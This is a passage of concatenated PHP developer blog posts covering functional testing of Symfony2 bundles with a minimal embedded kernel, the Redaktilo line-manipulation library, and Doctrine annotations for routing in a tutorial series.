<!-- File: app/phpunit.xml.dist -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.3/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="./bootstrap.php"
>
<testsuites>
<testsuite name="Test Suite">
<directory>./src/AppBundle/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
Now let's say we're testing the famous AcmeDemoBundle, and its hello world command:
<?php
namespace Acme\DemoBundle\Tests\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Output\NullOutput;
use Symfony\Component\Console\Input\ArrayInput;
class HelloWorldCommandTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $output;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$this->app = new Application($kernel);
$this->app->setAutoExit(false);
$this->output = new NullOutput();
}
public function testItRunsSuccessfully()
{
$input = new ArrayInput(array(
'command' => 'acme:hello',
'name' => 'Igor',
));
$exitCode = $this->app->run($input, $this->output);
$this->assertSame(0, $exitCode);
}
}
As you can see our test is neatly structured in 3 parts: input definition, the actual call and finally the check.
Note: the
setAutoExit method will ensure that the application doesn't call PHP's exit. The NullOutput ensures that nothing is displayed.
Once again let's test AcmeDemoBundle, this time the demo controller:
<?php
namespace Acme\DemoBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class DemoControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
$this->app->boot();
}
public function testHomepage()
{
$request = Request::create('/', 'GET');
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
public function testItSaysHello()
{
$request = Request::create('/hello/igor', 'GET');
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
public function testItSendsEmail()
{
$request = Request::create('/contact', 'POST', array(
'email' => 'igor@example.com',
'content' => 'Hello',
));
$response = $this->app->handle($request);
$this->assertTrue($response->isSuccessful());
}
}
Note: The
boot method makes the container available.
We stripped Symfony2 to its bare minimum and as a result we are now able to write functional tests without any effort.
I hope you enjoyed this article, please feel free to tweet me for any comment and question.
TL;DR: Redaktilo is a library which wraps array manipulation to make it feel like using a text editor.
Six months ago, I talked about a silly library I was working on.
I've just released its version 1.3, so I figured that maybe it's time to talk about the mature and useful project it has become.
First, here's some meaningless figures:
In my two previous pet projects (GnugatWizardBundle and Fossil), as well as in professional projects, I've encountered the need to manipulate lines (from a file or a static string).
I've done 3 different implementations, each less reusable than the other, so I started to think that there was something to do here.
That's how Redaktilo was born!
My purpose was to create a single service which would be used as a text editor ("redaktilo" means "editor", in esperanto):
<?php
namespace Gnugat\Redaktilo;
class Editor
{
// Filesystem operations:
public function open($filename, $force = false);
public function save(File $file);
// Line selection
public function jumpAbove(Text $text, $pattern, $location = null);
public function jumpBelow(Text $text, $pattern, $location = null);
// Line detection
public function hasAbove(Text $text, $pattern, $location = null);
public function hasBelow(Text $text, $pattern, $location = null);
// Line manipulations
public function insertAbove(Text $text, $addition, $location = null);
public function insertBelow(Text $text, $addition, $location = null);
public function replace(Text $text, $replacement, $location = null);
public function replaceAll(Text $text, $pattern, $replacement);
public function remove(Text $text, $location = null);
// You can execute custom commands!
public function run($name, array $input);
}
This service is stateless, it manipulates the following model:
<?php
namespace Gnugat\Redaktilo;
class Text
{
public function getLines();
public function setLines(array $lines);
public function getLength();
public function getLineBreak();
public function setLineBreak($lineBreak);
public function getCurrentLineNumber();
public function setCurrentLineNumber($lineNumber);
public function getLine($lineNumber = null);
public function setLine($line, $lineNumber = null);
}
Note: The
File model extends Text and adds a filename getter and setter.
As you can see, everything is centered around a current line, but specifying
directly a line number is possible (that's the meaning of the $location
argument).
To be honest, Editor doesn't do anything, it just wraps some low level
services. Amongst those, we have:
- SearchEngine: decides which SearchStrategy will be used
- CommandInvoker: executes a Command

Those two are actually here to provide extension points: if you need to look for a line with something other than a regular expression, you can create your own SearchStrategy, register it in the SearchEngine and it will be available directly from the Editor!
If the manipulations provided out of the box aren't sufficient, you can create
your own Command, register it in CommandInvoker and it will be available
directly from the Editor!
Commands rely on user input, which is why Loïck worked on InputSanitizer to
validate it. If the ones provided aren't enough, you can still create your own
implementations.
Finally, I'd like to highlight Wouter's work on the EditorFactory helper: it is
really cumbersome to instantiate Editor manually... But thanks to this
factory, you'll never have to do it by yourself!
Note: Working on a Symfony2 project? You can use RedaktiloBundle, which also provides tags to register custom search strategies and commands.
Loïck is currently improving the library's exceptions for the version 1.4.
For version 1.5, two new methods will be added to Text:
incrementCurrentLineNumber and decrementCurrentLineNumber, to avoid the
following:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/monty-python.txt');
// Currently
$currentLineNumber = $file->getCurrentLineNumber();
$file->setCurrentLineNumber($currentLineNumber + 2);
// Soon...
$file->incrementCurrentLineNumber(2);
For the final version 1.6, a strong documentation of the deprecations will be done, leading the way to version 2.0 where those will be removed (50% of the code base will vanish!).
Note: As I'm using Redaktilo everyday, I might discover new improvements to be done, leading the given version numbers above to change.
A question I've been often asked, because describing Redaktilo as a text editor might be a bit misleading. It is a library which feels like an editor, but it is in no way an actual editor you might run.
Here's an example of what you might be doing currently without Redaktilo:
<?php
$lines = file('/tmp/monty-python.txt');
$currentLineNumber = 42;
$section = array_slice($lines, 0, $currentLineNumber, true); // Lines from 0 to 42
$reversedSection = array_reverse($section, true);
$found = preg_grep('/a knewt/', $reversedSection); // finding the first occurrence, above line 42
$currentLineNumber = key($found);
array_splice($lines, $currentLineNumber + 1, 0, 'new line below "a knewt"');
$content = implode("\n", $lines); // Let's hope it wasn't a file created on Windows.
file_put_contents('/tmp/monty-python.txt', $content); // filename first, then content
With redaktilo:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/monty-python.txt');
$editor->jumpAbove($file, '/a knewt/', 42);
$editor->insertBelow($file, 'new line below "a knewt"');
$editor->save($file);
Because the code example on the README is about inserting a new line in the
AppKernel file of a Symfony2 application, I also get this question.
Redaktilo can edit any text file, so it includes source files. But keep in mind that it only manipulates lines, when you might want to manipulate an AST to edit code.
I'm working on a new silly project: Medio. It heavily relies on Redaktilo to actually edit code: so you can make a code editor with it, but again before you start ask yourself if an AST wouldn't be better.
Redaktilo is a library which makes line manipulation dead easy! It provides extension points and will soon reach version 2 which will mark its final maturity point.
Until then, you can still use it safely, it's been stable for 11 releases now.
TL;DR: Create an empty application in your bundle to allow people to test it (manually or automatically) outside of an actual application.
Symfony2 bundles are a great way to:
In this article, we will see how to make sure a third party bundle actually work by creating an embed application. We will then have a look at its practical use:
Creating a bundle is fairly easy as you just need to create the following class:
<?php
// File: AcmeStandaloneBundle.php
namespace Acme\StandaloneBundle;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class AcmeStandaloneBundle extends Bundle
{
}
It also needs a composer.json file, so it can be distributed all around the
world:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
}
}
Note: to release it, you would then need to create a git repository and to register it in Packagist.
Now how can we make sure our bundle would work in an application? We could create a whole new Symfony2 application, register our bundle in its app/AppKernel.php file and have a look... But we can do better!
We can create the smallest Symfony2 application ever inside our bundle:
<?php
// File: Tests/app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Acme\StandaloneBundle\AcmeStandaloneBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config.yml');
}
}
FrameworkBundle requires the following configuration parameter in order to work:
# File: Tests/app/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
I'd also advise you to create an autoload file to make things easier:
<?php
// File: Tests/app/autoload.php
$loader = require __DIR__.'/../../vendor/autoload.php';
require __DIR__.'/AppKernel.php';
The last step is to add the new dependency in the composer.json file:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
},
"require-dev": {
"symfony/framework-bundle": "~2.3"
}
}
We would also need to ignore the following directories:
# File: .gitignore
/Tests/app/cache
/Tests/app/logs
And that's it, we now have a minimalistic embed application in our bundle. As it can now be run on its own, it has become a Standalone Bundle!
Let's see the practical use.
Because your bundle now doesn't need any existing applications to be used, people will be able to test it manually and do some demonstrations with it.
Let's pretend we created a command in our bundle. We'd like to run it just to make sure everything works as expected. For this we'll need to create an embed console:
<?php
// File: Tests/app/console.php
set_time_limit(0);
require_once __DIR__.'/autoload.php';
use Symfony\Bundle\FrameworkBundle\Console\Application;
$kernel = new AppKernel('dev', true);
$application = new Application($kernel);
$application->run();
That's it! You can now run:
php Tests/app/console.php
Let's pretend we created a controller which returns some JSON data. We'd like to browse it just to make sure everything works as expected. For this, we'll need to create an embed web app:
<?php
// File: Tests/app/web.php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/autoload.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
That's it! You can now run:
php Tests/app/console.php server:run -d Tests/app
And browse your application.
Note: If you use a templating engine like Twig to render HTML pages, or if you use the Symfony2 Form Component in your bundle, don't forget to add the dependencies to your
composer.json file and to register the appropriate bundles in the embed AppKernel.
Manual tests are great to get a quick idea of what your bundle does. But an embed application is also great to write automated tests.
Let's pretend we created a service which is defined in the DIC. We'd like to make sure it is properly configured (e.g. checking that we didn't forget to inject a dependency). For this, we'll need to create a simple test:
<?php
// File: Tests/ServiceTest.php
namespace Acme\StandaloneBundle\Tests;
class ServiceTest extends \PHPUnit_Framework_TestCase
{
private $container;
protected function setUp()
{
$kernel = new \AppKernel('test', true);
$kernel->boot();
$this->container = $kernel->getContainer();
}
public function testServiceIsDefinedInContainer()
{
$service = $this->container->get('acme_standalone.service');
$this->assertInstanceOf('Acme\StandaloneBundle\Service', $service);
}
}
We need to add PHPUnit as a development dependency:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
},
"require-dev": {
"symfony/framework-bundle": "~2.3",
"phpunit/phpunit": "~4.3"
}
}
Finally we need to configure PHPUnit to use our autoload:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/4.3/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.3/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="./Tests/app/autoload.php"
>
<testsuites>
<testsuite name="Test Suite">
<directory>./Tests/</directory>
</testsuite>
</testsuites>
</phpunit>
That's it! You can now run:
./vendor/bin/phpunit
Note: You can of course use any testing framework of your choice.
Let's pretend we created a command. We'd like to run it automatically and check its exit code to make sure it works. For this, we'll need to create a simple test:
<?php
// File: Tests/Command/DemoCommandTest.php
namespace Acme\StandaloneBundle\Tests\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Output\NullOutput;
class DemoCommandTest extends \PHPUnit_Framework_TestCase
{
private $application;
protected function setUp()
{
$kernel = new \AppKernel('dev', true);
$this->application = new Application($kernel);
}
public function testItRunsSuccessfully()
{
$output = new NullOutput();
$input = new ArrayInput(array(
'command' => 'acme:demo',
'argument' => 'value',
'--option' => 'value',
));
$exitCode = $this->application->run($input, $output);
$this->assertSame(0, $exitCode);
}
}
And that's it!
Let's pretend we created a controller which returns some JSON data. We'd like to browse it automatically and check its status code to make sure it works. For this, we'll need to create a simple test:
<?php
// File: Tests/Controller/DemoControllerTest.php
namespace Acme\StandaloneBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Output\NullOutput;
class DemoControllerTest extends \PHPUnit_Framework_TestCase
{
private $client;
protected function setUp()
{
$kernel = new \AppKernel('test', true);
$kernel->boot();
$this->client = $kernel->getContainer()->get('test.client');
}
public function testItRunsSuccessfully()
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode(array('parameter' => 'value')); // the request body must be a string
$this->client->request(
'POST',
'/demo',
array(),
array(),
$headers,
$content
);
$response = $this->client->getResponse(); // request() returns a Crawler, not the Response
$this->assertTrue($response->isSuccessful());
}
}
The test.client service is only available when the test configuration
parameter is set.
# File: Tests/app/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
test: ~
And that's it!
Note: When creating APIs, you might want to test the precise status code.
Creating an embed application in a third party bundle is fairly easy and brings many advantages as it enables demonstrations and simple automated tests.
I hope you enjoyed this article, if you have any questions or comments, please let me know.
TL;DR: Redaktilo provides a nice API to manipulate array of lines (insert, replace, go to line, etc).
Arrays are surely one of the most used PHP features: they're simple, convenient and benefit from a large set of standard functions to manipulate them.
Let's see the different possibilities:
In order to find the index of a string in an array, we can use one of the following functions:
<?php
$montyPython = array(
'This is a dead parrot',
'No, no, it\'s not dead, it\'s resting!',
);
$exactSentence = 'This is a dead parrot';
array_search($exactSentence, $montyPython, true); // Returns 0
$regex = '/resting!$/';
$found = preg_grep($regex, $montyPython);
key($found); // Returns 1
Note: The third parameter of array_search enables strict comparison (it makes sure the types are also the same).
We can find the matching elements of a pattern using
preg_grep. To get the index of the first result
found, we can use key.
It's great! Now what if we want to remember the index and then make a search
relatively to it? For example we want to find the index of the element
/a knewt/, but only in the elements above ... I got better...:
<?php
$holyGrail = array(
'She turned me into a knewt!',
'A knewt?',
'... I got better...',
'A WITCH!',
);
$index = array_search('... I got better...', $holyGrail, true);
$section = array_slice($holyGrail, 0, $index, true);
$reversedSection = array_reverse($section, true);
$found = preg_grep('/a knewt/', $reversedSection);
key($found); // Returns 0
In this code snippet, we get a subset of the array
(from the first element to ... I got better) using
array_slice (the last argument allows to keep
the indexes unchanged). This also excludes ... I got better....
Then we change the order of the elements using
array_reverse (the second argument allows to
keep the index unchanged) so the element above ... I got better... would be
the first result.
Finally we look for /a knewt/ as we did previously.
If we want to insert a new element after a given index in the array, we need to
use array_splice:
<?php
$grandPiano = array(
'I would like to learn how to fly an aeroplane',
'A what?',
'An aeroplane',
'OH! An aeroplane, oh I say we are grand aren\'t we?',
'Pardon me while I\'m flying me aeroplane... NOW GET ON THE TABLE!',
);
$found = preg_grep('/grand/', $grandPiano);
$index = key($found);
array_splice($grandPiano, $index + 1, 0, 'No more cluttered cream for me, butler, I\'m off to play the grand piano');
Actually array_splice allows to replace a subsection of an array. Here's the
explanation of its arguments:
- the array to modify
- the offset at which the replacement starts
- the length of the subsection to replace (0 means replacing nothing, therefore just inserting)
- the replacement (here, the new element to insert)

It's not very explicit, but we have a solution for this (keep reading to find out).
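A minimal demonstration of a pure insertion with array_splice:

```php
<?php

$lines = array('first', 'third');

// Offset 1, length 0: replace nothing, just insert before index 1.
array_splice($lines, 1, 0, array('second'));

print_r($lines); // first, second, third
```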
Here's an easy one:
<?php
$parrot = array(
'Hello, I would like to make a complain. Hello, miss?',
'What do you mean miss?',
'Sorry, I have a cold',
);
$index = array_search('Sorry, I have a cold', $parrot, true);
unset($parrot[$index]);
You might want to reorder the indexes, to avoid gaps:
<?php
$parrot = array(
'Hello, I would like to make a complain. Hello, miss?',
'What do you mean miss?',
'Sorry, I have a cold',
);
$index = array_search('What do you mean miss?', $parrot, true);
unset($parrot[$index]);
// Current value:
// $parrot = array(
// 0 => 'Hello, I would like to make a complain. Hello, miss?',
// 2 => 'Sorry, I have a cold',
// );
$parrot = array_values($parrot);
// Current value:
// $parrot = array(
// 0 => 'Hello, I would like to make a complain. Hello, miss?',
// 1 => 'Sorry, I have a cold',
// );
The array_values function is equivalent to:
<?php
$newArray = array();
foreach ($oldArray as $element) {
$newArray[] = $element;
}
Until now, we've been using a hard-coded array, but this is rarely what we encounter in real-life projects. The data could, for example, come from a file, which can be transformed into an array of lines:
<?php
$file = file('/tmp/holy-grail.txt', FILE_IGNORE_NEW_LINES);
Note: the second argument will remove the trailing line breaks.
The only problem with file is that it will remove the
last line if it's empty. Let's use another function:
<?php
$content = file_get_contents('/tmp/holy-grail.txt');
$lines = explode("\n", $content);
The file_get_contents function returns the
content as a string.
We used explode to split it into an array of lines.
This assumes that the file hasn't been created on Windows (where the line
separator is \r\n)... We need to detect the line break:
<?php
$content = @file_get_contents('/tmp/holy-grail.txt');
$lineBreak = "\n"; // Used by every system (except Windows), so used as default
if (false === strpos($content, "\n")) { // No line break detected at all
$lineBreak = PHP_EOL; // Using the system's one
}
if (false !== strpos($content, "\r\n")) { // Windows line break detected
$lineBreak = "\r\n";
}
$lines = explode($lineBreak, $content);
Note: there are many checks to be done before actually reading the file (does the file actually exist? Do we have permission to read it?). We have a solution for this (keep reading to find out).
If we do any changes to those lines, we might want to save them on the filesystem:
<?php
$lines = array(
'Morning, morning, morning',
'Morning Jim, Morning Jack',
'Can\'t complain, keep coming back',
'Boring, boring, boring',
);
$lineBreak = "\n"; // Or whatever has been detected
$content = implode($lineBreak, $lines);
file_put_contents('/tmp/silly-walk-song.txt', $content);
To convert the array of lines back to a string content, we use
implode.
To write the content to the file, we use
file_put_contents.
Note: there are many checks to be done before actually writing to a file (does the path actually exist? Do we have the permissions? What happens if the writing process fails during execution?). To solve this, use the Symfony2 Filesystem Component (
Filesystem#dumpFile()).
You don't find array_splice very explicit for element insertion (or can't find
a way to remember its arguments' order/meaning)?
Keeping the elements, the index and the line break in separate variables looks too procedural for you?
And what about error management?
Don't panic! There is a better way: Redaktilo (it means "Editor" in Esperanto).
This small library makes array manipulation easier by providing:
- an Editor object (open, save, find, insert, etc.)
- a Text object (line break, elements, current index, etc.)
- a File object (same as Text, but with a filename)
Use it in your projects, thanks to Composer:
composer require 'gnugat/redaktilo:~1.1'
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
Note: In order to make operations more explicit, Redaktilo has adopted the vocabulary of file editing (more specifically, the manipulation of lines). But in the end it's still array manipulation.
You don't have to worry about file checking and line break detection anymore:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$file->getLineBreak(); // Returns "\n" if the file hasn't been created on Windows
Redaktilo takes care of the search strategy for you (it uses preg_grep when
you give a valid regular expression, and array_search when you give a string).
It supports search relative to the current line number stored in the given
Text and File (it uses array_slice, array_reverse and key internally).
The hasAbove and hasBelow methods just return a boolean, while the
jumpAbove and jumpBelow methods rather store the found line number in the
given Text and File (and raise an exception if nothing is found):
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$editor->jumpBelow($file, 'Boring, boring, boring');
$file->getCurrentLineNumber(); // Returns 3
$editor->hasAbove($file, '/morning,/'); // Returns true
Note:
hasAbove, hasBelow, jumpAbove and jumpBelow all have a third argument which is a line number. If provided, the search will be done relatively to this line number, rather than to the current one. For example, checking the presence of a pattern in the whole file can be done as:
$editor->hasBelow($file, $pattern, 0); // starts the search from the top of the file.
No more array_splice nonsense!
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$editor->insertAbove($file, 'The silly walk song');
Note:
insertAbove, insertBelow, replace and remove all have a third argument which is a line number. If provided, the manipulation will be done relatively to it, instead of relatively to the current one.
If you're not manipulating a file, you can use Text just like we used
File:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
use Gnugat\Redaktilo\Service\LineBreak;
use Gnugat\Redaktilo\Service\TextFactory;
$lineBreak = new LineBreak();
$textFactory = new TextFactory($lineBreak);
$text = $textFactory->make(<<<EOF
Some raw text you would have got from somewhere,
for example a database.
EOF
);
$editor = EditorFactory::createEditor();
$editor->hasBelow($text, '/a database/'); // Returns true
There are many more operations available, as you can discover in the documentation.
To make things easier, here's a cheat sheet.
<?php
namespace Gnugat\Redaktilo;
use Gnugat\Redaktilo\Search\PatternNotFoundException;
use Gnugat\Redaktilo\Search\SearchEngine;
use Gnugat\Redaktilo\Service\Filesystem;
use Symfony\Component\Filesystem\Exception\FileNotFoundException;
use Symfony\Component\Filesystem\Exception\IOException;
class Editor
{
public function open($filename, $force = false); // @throws FileNotFoundException
public function save(File $file); // @throws IOException If cannot write
// @throw PatternNotFoundException
public function jumpAbove(Text $text, $pattern, $location = null);
public function jumpBelow(Text $text, $pattern, $location = null);
// @return bool
public function hasAbove(Text $text, $pattern, $location = null);
public function hasBelow(Text $text, $pattern, $location = null);
public function insertAbove(Text $text, $addition, $location = null);
public function insertBelow(Text $text, $addition, $location = null);
public function replace(Text $text, $replacement, $location = null);
public function remove(Text $text, $location = null);
}
<?php
namespace Gnugat\Redaktilo;
class Text
{
public function getLines();
public function setLines(array $lines);
public function getLength();
public function getLineBreak();
public function setLineBreak($lineBreak);
public function getCurrentLineNumber();
// @throw InvalidLineNumberException
public function setCurrentLineNumber($lineNumber);
public function getLine($lineNumber = null);
public function setLine($line, $lineNumber = null);
}
<?php
namespace Gnugat\Redaktilo;
class File extends Text
{
public function getFilename();
public function setFilename($filename);
}
PHP provides plenty of built-in functions to manipulate arrays, but those are not enough. Redaktilo is a small library which provides a nicer API.
It allows you to select a line relatively to the current one and then do CRUD operations on it.
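As a recap, here's a short session combining the operations seen above, including persisting the changes with save (this sketch assumes the /tmp/silly-walk-song.txt file from the earlier examples exists):

```php
<?php

require __DIR__.'/vendor/autoload.php';

use Gnugat\Redaktilo\EditorFactory;

$editor = EditorFactory::createEditor();

// Open the file, jump to a line, replace it and write the file back.
$file = $editor->open('/tmp/silly-walk-song.txt');
$editor->jumpBelow($file, 'Boring, boring, boring');
$editor->replace($file, 'Exciting, exciting, exciting');
$editor->save($file);
```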
I hope you'll find it as useful as I do. If you find any bugs or have any proposals, feel free to report them on GitHub, where Loïck Piera and myself will both be glad to help you.
Note: As of 15/10/2014, the current version of Redaktilo is 1.1.6 (stable). Future updates are already planned!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the conclusion of the series on mastering the Symfony2 framework. Have a look at the five articles:
It quickly sums up what we've seen and provides some directions for the next steps, for those interested in learning more (there's always more!).
In these 6 articles, we've learned how to master Symfony2 through:
As a bonus, we've also seen:
There's still a great deal more to learn, but with this series we've hopefully seen the strict minimum needed to create any day-to-day application, with deep knowledge of how to extend the framework and where to put our code.
We've seen Symfony as a full stack framework: it deals with the HTTP protocol for you. But the truth is that Symfony is a collection of third party libraries before anything else. Here's a short selection of its available components:
Do you want to go further? Then have a look at these fabulous resources:
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the sixth article of the series on mastering the Symfony2 framework. Have a look at the first five:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── doctrine.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── console
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── EventListener
│ │ └── SubmitJsonListener.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ ├── doctrine
│ │ │ └── Quote.orm.yml
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this article, we'll discover annotations.
Inspired by Python Decorators and Java Annotations, the Doctrine Project created a convenient library allowing you to put information (like configuration) and source code in the same file.
In concrete terms, Annotations
are comments which are read by AnnotationReader and can then be cached in any
format (generally PHP) to make things faster afterwards.
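Under the hood, reading an annotation is roughly this — a minimal sketch assuming the doctrine/annotations library is installed (in the full stack framework you'd rarely call the reader yourself; the class and method names here are just examples):

```php
<?php

require __DIR__.'/vendor/autoload.php';

use Doctrine\Common\Annotations\AnnotationReader;

$reader = new AnnotationReader();

// The reader parses the method's docblock and instantiates one object
// per annotation (e.g. a Route object for @Route).
$reflectionMethod = new \ReflectionMethod(
    'Fortune\ApplicationBundle\Controller\QuoteController',
    'submitAction'
);
$annotations = $reader->getMethodAnnotations($reflectionMethod);
```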
Its main strength is the possibility to avoid having a configuration file in a
path too far from the source code which uses it. For example, instead of having
the schema definition in src/Fortune/ApplicationBundle/Resources/config/doctrine/Quote.orm.yml
we could have it directly in the Quote entity.
The Sensio FrameworkExtra Bundle
provides controller annotations; amongst them is @Route, allowing us to move
the routing configuration from app/config/routing.yml directly to the actions.
Let's download the bundle:
composer require sensio/framework-extra-bundle:~3.0
Then register it:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Finally, we need to tell Doctrine's Annotation library where to find the classes by registering Composer's autoloader:
<?php
// File: app/autoload.php
use Doctrine\Common\Annotations\AnnotationRegistry;
$loader = require __DIR__.'/../vendor/autoload.php';
AnnotationRegistry::registerLoader(array($loader, 'loadClass'));
return $loader;
This file should be used in our front controller:
<?php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/app/autoload.php';
require_once __DIR__.'/../app/AppKernel.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
But also in our test suite:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="autoload.php">
<testsuites>
<testsuite name="Functional Test Suite">
<directory>../src/*/*/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
We can now empty the routing.yml file and tell it to import the configuration
from the QuoteController using its annotations:
# File: app/config/routing.yml
fortune_application:
resource: "@FortuneApplicationBundle/Controller"
type: annotation
The controller itself will look like this:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
/**
* @Route("/api/quotes", methods={"POST"})
*/
public function submitAction(Request $request)
{
$postedValues = $request->request->all();
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
/**
* @Route("/api/quotes", methods={"GET"})
*/
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
And now annotations are ready to be used, as the tests prove:
./vendor/bin/phpunit -c app
That's green enough for us to commit:
git add -A
git commit -m 'Used annotations'
Annotations allow us to remove the distance between configuration and code.
Note: You should know that annotations can raise concerns about tight coupling, but this doesn't seem to be relevant when they're used as configuration.
The best thing to do is to minimize their use to the classes which are already coupled to our tools (for example the controllers), and to do some research on the subject to form your own opinion.
If the concept seduces you, have a look at the ControllerExtraBundle.
The next article will be the conclusion. I hope you enjoyed this series!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on mastering the Symfony2 framework. Have a look at the first four:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── doctrine.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
